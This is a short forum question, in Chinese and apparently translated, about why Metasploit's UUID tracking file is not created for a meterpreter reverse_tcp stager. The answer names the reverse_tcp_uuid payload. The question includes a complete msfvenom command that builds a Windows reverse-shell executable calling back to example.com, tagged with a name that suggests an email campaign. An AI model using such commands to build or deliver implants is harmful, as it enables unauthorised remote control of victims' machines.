Meterpreter reverse_tcp stager和UUID跟踪

时间:2015-09-12 11:17:10

标签: metasploit msf

我正在尝试使用UUID跟踪创建 meterpreter / reverse_tcp stager,但未创建〜/ .msf4 / payloads.json

这是msfvenom命令:

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp LHOST=example.com LPORT=4444 PayloadUUIDTracking=true PayloadUUIDName=EmailCampaign20150101 -f exe -o payload.exe

但是当我将有效负载更改为 meterpreter / reverse_https 时,所有内容都按预期工作。

这意味着什么? reverse_tcp stagers不支持UUID? 因为当我查看 meterpreter / reverse_tcp stager的ASM代码时,它包含部分,何时发送UUID。 https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb#L179

感谢您的建议。

1 个答案:

答案 0 :(得分:0)

reverse_tcp_uuid payload和handler支持UUID跟踪。